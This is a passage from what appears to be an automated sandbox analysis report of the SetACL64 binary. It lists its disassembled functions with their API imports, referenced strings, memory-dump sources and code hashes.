API ID: Is_bad_exception_allowed
String ID: csm$csm$csm
API String ID: 2758241748-393685449
Opcode ID: a2d6ed14fbf6e40508f258423ea3b56d009d783b16296921d7f948e16fc77ced
Instruction ID: a422ae18237fe7795466932cd13a1cafdda90cd3d2cbc25a42a644869784f36c
Opcode Fuzzy Hash: a2d6ed14fbf6e40508f258423ea3b56d009d783b16296921d7f948e16fc77ced
Instruction Fuzzy Hash: D0E1AFB2E08782CAEB209F24D8853AD77A0FB45788F144175DA8ED7796DF38E485CB40

Function 00007FF69706DC00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 241COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69706DF79
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706DF85

Strings

gfffffff, xrefs: 00007FF69706DEFC
gfffffff, xrefs: 00007FF69706DC23

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: gfffffff$gfffffff
API String ID: 73155330-161084747
Opcode ID: 65c4fbde1530cd6c047e0c087b113539f9e2fee0312e09cc542a9da4f50b182a
Instruction ID: 8c3f780f5c5c580ff8ffd813a4490c6f862483b351b2ff458a71d87291c80d9e
Opcode Fuzzy Hash: 65c4fbde1530cd6c047e0c087b113539f9e2fee0312e09cc542a9da4f50b182a
Instruction Fuzzy Hash: 02A1AEA2A05B8982DE24CF16E4502AD73A4F798BC4F518636DF8DC7745DF38E295C301

Function 00007FF697093804 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF697093AE0

Part of subcall function 00007FF69708DA74: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69708DA91

Strings

UTF-8, xrefs: 00007FF697093A5F
ccs, xrefs: 00007FF697093A1B
UTF-16LEUNICODE, xrefs: 00007FF697093A7E

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
Instruction ID: 55169cbd610448d8985987aa720b6a1940dfb22dca18a2f244248d7c548c2c7a
Opcode Fuzzy Hash: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
Instruction Fuzzy Hash: E981D0F2E0C24285FB754F298610379E6A0EB31BC8F5590B5DA8ED76D4CF2DE8019B41

Function 00007FF6970766FC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF69707676C
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6970767B7

Strings

RCC, xrefs: 00007FF697076788
MOC, xrefs: 00007FF697076780

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 42ee9dd8031fa90d2704141954d4b245ff7b62f28e672c949d78bded72fb3b52
Instruction ID: e953fe5179cadd6a8bc481bf6f68f826587914253d729d36bff539b9c590eff3
Opcode Fuzzy Hash: 42ee9dd8031fa90d2704141954d4b245ff7b62f28e672c949d78bded72fb3b52
Instruction Fuzzy Hash: 81918EB3A08B85CAE760CB65E8802AD7BA0FB447C8F14416AEB8DD7759DF38D195C700

Function 00007FF69707B4C4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69707B4FE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69707B6D3

Strings

*, xrefs: 00007FF69707B5FC
, xrefs: 00007FF69707B651

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: c990fed08c054b4bafabfd0712f02d3fa7d918f2f89bfa53ed27954d69bca4da
Instruction ID: 39734ea763d5fd8893879a52bf822e0708b6e06ffab38f3e7a6ff278bb169f07
Opcode Fuzzy Hash: c990fed08c054b4bafabfd0712f02d3fa7d918f2f89bfa53ed27954d69bca4da
Instruction Fuzzy Hash: 1B6164F290D252C6E7798F28885417D3BA1FB05F88F5451BADB4AC2298EF3CE841CB54

Function 00007FF697076C70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF697076C98
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF697076D80

Strings

csm, xrefs: 00007FF697076CBA
csm, xrefs: 00007FF697076DD2

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eecb3a479b2a8091ed75647188cb13960218c4eb8784a86b31c02a998fb32c90
Instruction ID: 4127bdb7b6aeef9f6c75d09c083ba86eecd49841dbce4071d3cda1d1a1995a2b
Opcode Fuzzy Hash: eecb3a479b2a8091ed75647188cb13960218c4eb8784a86b31c02a998fb32c90
Instruction Fuzzy Hash: 20515DB2908682C6EB748B21D9443B977A0FB54BD8F189175DACEC7B95CF3CE4608B01

Function 00007FF69708926C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6970892AF

Strings

e+000, xrefs: 00007FF697089354
gfff, xrefs: 00007FF6970893D1
-, xrefs: 00007FF6970893A6

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$e+000$gfff
API String ID: 3215553584-2620144452
Opcode ID: b957d2cc3425ec91ce08f74e2f63db020459ef895d73246136ae502abcf24435
Instruction ID: 93081b9b83a27ce45eb1d6cca590f267c4e9e4267880e2d50f8ada78e04ad2e2
Opcode Fuzzy Hash: b957d2cc3425ec91ce08f74e2f63db020459ef895d73246136ae502abcf24435
Instruction Fuzzy Hash: 8151E5A2B286C146E7759F39D8413AD7B91E781BD0F4892B1DB98C7BD6CE2DD444C700

Function 00007FF69704D0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF69704D0CB
LeaveCriticalSection.KERNEL32 ref: 00007FF69704D1AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704D1CC

Part of subcall function 00007FF697044FC0: GetModuleFileNameW.KERNEL32 ref: 00007FF69704503A

Strings

.log, xrefs: 00007FF69704D117

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CriticalSection$EnterFileLeaveModuleName_invalid_parameter_noinfo_noreturn
String ID: .log
API String ID: 3890993197-299349702
Opcode ID: d1984f5f7160b112c225d9afbce00dc298177562a86290b7b952876b9305a88a
Instruction ID: 3f477e57370d5291ae05552674f38748e24ae23cdf6ee21af2189bca79f12d3b
Opcode Fuzzy Hash: d1984f5f7160b112c225d9afbce00dc298177562a86290b7b952876b9305a88a
Instruction Fuzzy Hash: E321B4E1A0964290EE30AB24E8452796771FF95BE0F801671EB6DC77E9EF3CE5848700

Function 00007FF69706B1AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69706AA60: SysAllocString.OLEAUT32 ref: 00007FF69706AAAF
Part of subcall function 00007FF69706AA60: SysAllocString.OLEAUT32 ref: 00007FF69706AAFD
Part of subcall function 00007FF69706AA60: SysFreeString.OLEAUT32 ref: 00007FF69706AD13
Part of subcall function 00007FF69706AA60: SysFreeString.OLEAUT32 ref: 00007FF69706AD50

CoUninitialize.OLE32 ref: 00007FF69706B1D6

Strings

Jo, xrefs: 00007FF69706B231

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: String$AllocFree$Uninitialize
String ID: Jo
API String ID: 3194604352-866799578
Opcode ID: fb526238290185d568cb8d2a9593fae541931b6e55344edac3bb91d1d3bb4913
Instruction ID: 0ea9b586222b74f8ae59490fff70f4f9974ff9f5cef57c6c4fb148e48e12245c
Opcode Fuzzy Hash: fb526238290185d568cb8d2a9593fae541931b6e55344edac3bb91d1d3bb4913
Instruction Fuzzy Hash: 6B1191E2B0594291FA20AB29D55537E2362FF44BD4F504872CB0CC7692EF3CE5D08204

Function 00007FF6970426D0 Relevance: 6.2, APIs: 4, Instructions: 173COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970427A0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6970427A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697042944
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704294A

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: 4c107eee0b4e4811bc64223c6d6b2de02e59749188d4f6f301365c20f6b63f69
Instruction ID: 265c33bbef06f9c8847e2b71f81e9a5638b2fe2d514c0e54c23eecc8ea3d6857
Opcode Fuzzy Hash: 4c107eee0b4e4811bc64223c6d6b2de02e59749188d4f6f301365c20f6b63f69
Instruction Fuzzy Hash: 8771C0A2B19B4199EB10DF25D4403AC2361FB68BE8F408671DB6C837D9EF38E190C340

Function 00007FF697093EF8 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF697093F39
_invalid_parameter_noinfo.LIBCMT ref: 00007FF697093FB9
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69709400D
_get_daylight.LIBCMT ref: 00007FF697094065

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
Instruction ID: 2538cee995c2d87586fc08370d46db8c80fe6d9f3d18659bb3400b82d7405e30
Opcode Fuzzy Hash: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
Instruction Fuzzy Hash: 0E51E7B2E0C61342FBB54F28951537EA990EFA07D4F1944B5EA4DC72D5EE3DE8408B42

Function 00007FF69709AAE0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF69709AB48
CloseHandle.KERNEL32 ref: 00007FF69709AB55
CloseHandle.KERNEL32 ref: 00007FF69709AB62
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69709ABC7

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CloseHandle$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2401491561-0
Opcode ID: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
Instruction ID: fd5db7550af42a6f49f5a6aecaf680814d1a58a4b4c0eb36904deee74de60a9a
Opcode Fuzzy Hash: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
Instruction Fuzzy Hash: 19313BE5B19A4681FE648B25E8952382362FF98FD4F8849B1CA5DC77A5DF6CB5808200

Function 00007FF69704EA60 Relevance: 6.0, APIs: 4, Instructions: 34synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF69704EA79
ResetEvent.KERNEL32 ref: 00007FF69704EABC
ReleaseMutex.KERNEL32 ref: 00007FF69704EAC6
SetEvent.KERNEL32 ref: 00007FF69704EAD0

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Event$MutexObjectReleaseResetSingleWait
String ID:
API String ID: 2375943032-0
Opcode ID: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
Instruction ID: bcc9a5fd2e6ffa2f413793952cac8e565487a2c92260a59148ceb6e02809006b
Opcode Fuzzy Hash: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
Instruction Fuzzy Hash: 8E01C872605B8581EB648F21E89432D73A4FBA8F98F548175DA5DC73A4EF38D895C340

Function 00007FF697031710 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

-log, xrefs: 00007FF697031850

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID: -log
API String ID: 0-56760616
Opcode ID: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
Instruction ID: 20a4afc171a4e60f9475d09f3e0fc007733d402e8263013cbd754049dc188e53
Opcode Fuzzy Hash: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
Instruction Fuzzy Hash: 9F919CB2B15E4299EB24CBA5D4406AC23B1FB49BE8F404676CE1DD7BD8EE38E445C340

Function 00007FF69707B6DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69707B714
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69707B94A

Strings

*, xrefs: 00007FF69707B823

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: *
API String ID: 3215553584-163128923
Opcode ID: 6066750e8e38b2fbd27d1c04c52ba2ad67439ad4c10818e761ddec3964bdc898
Instruction ID: dbc6f760070934088d9476929200fd74f023c25fe264ca86bc2bad9774cd2dbd
Opcode Fuzzy Hash: 6066750e8e38b2fbd27d1c04c52ba2ad67439ad4c10818e761ddec3964bdc898
Instruction Fuzzy Hash: B17196F2D0921286E7B89F29885517D3BA0FB05F98F1401BEDA4EC6298FF38D881D754

Function 00007FF697076EA8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF697076ED2

Strings

csm, xrefs: 00007FF697077066
csm, xrefs: 00007FF697076EF7

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
Instruction ID: cedda10396c1e5fec382d32b71f15af72770cb18fd6f71212e80e87a3fe38237
Opcode Fuzzy Hash: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
Instruction Fuzzy Hash: 16718EB2A0868186DB708B25D89077DBBE1EB81FC9F1491B6DE8DC7B85DE2CD491C740

Function 00007FF6970764E4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF697076530

Strings

MOC, xrefs: 00007FF697076544
RCC, xrefs: 00007FF69707654D

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
Instruction ID: 9be6303af197e595ee73bd674d702da7383c30f459be4d798920fad58767f57f
Opcode Fuzzy Hash: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
Instruction Fuzzy Hash: 785149B2A08A85CAEB208F65D8403AD77A0FB44BC8F544265EF8ED7B59DF38E555C700

Function 00007FF69706B313 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

?\UNC\, xrefs: 00007FF69706B48A
\\?, xrefs: 00007FF69706B342

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID: ?\UNC\$\\?
API String ID: 0-2035776247
Opcode ID: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
Instruction ID: 5daa1228fd8084f54e9de3f2a46ceac8b44dd487cd721f06daa1ced37866399e
Opcode Fuzzy Hash: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
Instruction Fuzzy Hash: 8C41CDE2F18A6681EE209B61C4643BD3361EB147D8F904272EA4DD3BC5EE6C92C0C244

Function 00007FF697043F80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044104
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69704410A

Strings

tss, xrefs: 00007FF697043F98

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

